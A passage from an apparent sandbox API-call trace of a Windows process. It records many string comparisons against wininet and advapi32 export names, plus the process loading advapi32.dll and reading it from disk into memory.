(lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0156.071] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0156.072] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0156.072] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0156.073] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0156.073] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0156.074] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0156.075] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0156.075] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0156.075] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0156.075] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.075] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0156.075] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.075] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0156.076] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0156.077] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0156.078] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0156.088] GetProcessHeap () returned 0x450000 [0156.088] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4100040 | out: hHeap=0x450000) returned 1 [0156.173] GetProcessHeap () returned 0x450000 [0156.173] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469040 [0156.174] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0156.174] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0156.175] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0156.175] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0156.175] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0156.175] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0156.175] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0156.175] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0156.175] GetProcessHeap () returned 0x450000 [0156.175] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa3ef0) returned 0x2d42010 [0156.177] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0156.177] ReadFile (in: hFile=0x140, lpBuffer=0x2d42010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d42010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0156.187] CloseHandle (hObject=0x140) returned 1 [0156.187] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0156.188] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0156.188] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0156.188] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0156.188] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0156.188] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0156.188] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0156.188] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0156.188] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0156.188] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0156.188] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0156.188] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0156.189] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0156.189] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0156.189] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0156.190] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0156.190] lstrcmpA 